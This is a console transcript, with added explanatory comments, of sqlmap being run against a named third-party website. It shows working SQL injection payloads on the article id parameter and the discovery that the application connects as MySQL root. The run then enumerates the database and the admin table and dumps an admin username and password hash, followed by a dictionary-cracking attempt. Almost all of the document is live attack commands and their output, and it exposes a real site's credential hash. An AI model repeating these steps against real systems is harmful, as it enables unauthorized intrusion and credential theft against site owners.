[Note: this transcript targets a live third-party host; only run these commands against systems you are authorized to test.]
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user   /* note: fetch the name of the DB user the web application connects as */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
(0 requests because the injection data was resumed from the session file rather than re-tested)
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'   /* note: the application connects as MySQL root, so the injection inherits full DBMS privileges -- a least-privilege failure separate from the injection itself */
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db   /* note: fetch the name of the database the application is currently using */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"   /* note: list the tables in the current database */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0   /* note: list the columns of the admin table; -v 0 suppresses the INFO lines seen in the earlier runs. The stray "users" token in the pasted command is not a sqlmap option and has been dropped */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |   /* note: a 32-character column holding a 32-hex value (see the dump below) is consistent with an unsalted MD5 digest -- confirm against the application's login code */
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0   /* note: dump the contents of the selected columns */
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
/* note: no cracked plaintext is printed next to the hash, so the bundled wordlist (with suffixes) evidently did not recover it -- or the output was trimmed before pasting */

shutting down at: 16:58:14

D:\Python27\sqlmap>